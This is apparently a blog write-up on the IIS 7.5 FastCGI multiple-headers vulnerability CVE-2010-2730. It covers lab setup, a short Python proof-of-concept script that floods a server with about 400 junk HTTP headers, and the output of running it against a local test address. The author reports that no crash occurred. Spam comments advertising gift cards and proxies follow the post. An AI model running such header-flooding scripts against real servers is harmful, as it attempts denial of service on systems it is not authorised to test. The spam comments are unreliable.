Checkpoint details the Vulnerability as
"The vulnerability is due to a heap buffer overflow error when processing unexpected number of headers in an HTTP request. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to a target server. Successful exploitation would allow an attacker to inject and execute arbitrary code on the target system with the security privileges of the IIS Worker process."
Configuring FastCGI for IIS 7.5
Browse to
Control Panel -> Programs and Features
click "Turn Windows features on or off" and follow the path shown below.
Note: I also tried enabling only CGI and un checking all the other checkboxes given below.
Install Administrator pack for IIS 7.5 after installing the pack click on start and type IIS you will see Internet Information Services (IIS Manager), clicking on it will take you to below window.
Configure FastCGI as shown below
If you feel configuration didn'g go fine you can configure and verify the same using CLI.
appcmd.exe is found at
%windir%\system32\inetsrv\
If FastCGI installation is successful accessing
http://localhost/phpinfo.cgi
should show below page. I created the page phpinfo.php under
C:\Inetpub\wwwroot\
make sure the directory has proper permissions.
Proof of Concept
#!/usr/bin/python import os, sys import urllib2 def main(all_args): print "in main" if len(all_args) != 3: print "invalid args" print "usage:\n\t%s server_ip_addr http_port"%(all_args[0]) sys.exit(); headers = {"Host":all_args[1], "Accept": "text/html,application/xhtml+xml,application/xml", "Accept-Language": "en-us", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive": "115", "Connection": "keep-alive"} for k,v in headers.items(): print (k, v) #create junk headers print "Creating junk Request Headers" for i in range(1,400): junk_header = "My-Name" + str(i) value = "Praveen Darshanam" + str(i) headers.update({junk_header: value}) url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php" #url = "http://" + all_args[1] + "/info.php" print "url: " + url #data = "From Praveen Darshanam" #req = urllib2.Request(url, data, headers) req = urllib2.Request(url, None, headers) response = urllib2.urlopen(req) print "Response Length =" + str(len(response.read())) if __name__ == "__main__": print "sys.argv=" + str(sys.argv) main(sys.argv)
Usage
./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py server_ip_addr http_port
praveend@praveend-VirtualBox:~$
$ ./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py 192.168.56.110 80
sys.argv=['./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py', '192.168.56.110', '80']
in main
('Accept-Language', 'en-us')
('Connection', 'keep-alive')
('Accept', 'text/html,application/xhtml+xml,application/xml')
('Keep-Alive', '115')
('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
('Host', '192.168.56.110')
Creating junk Request Headers
url: http://192.168.56.110:80/phpinfo.php
Response Length =119639
Exploit Traffic
I didn't see any crash after sending multiple fake headers, not sure if I interpreted the Vulnerability in correct manner.
References
https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx
http://www.iis.net/configreference/system.webserver/fastcgi
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730
http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html
http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html
https://technet.microsoft.com/library/security/ms10-065
What a really awesome post this is. Truly, one of the best posts I've ever witnessed to see in my whole life. Wow, just keep it up. iTunes Gift Card Codes
ReplyDeletehttps://saglamproxy.com
ReplyDeletemetin2 proxy
proxy satın al
knight online proxy
mobil proxy satın al
MUC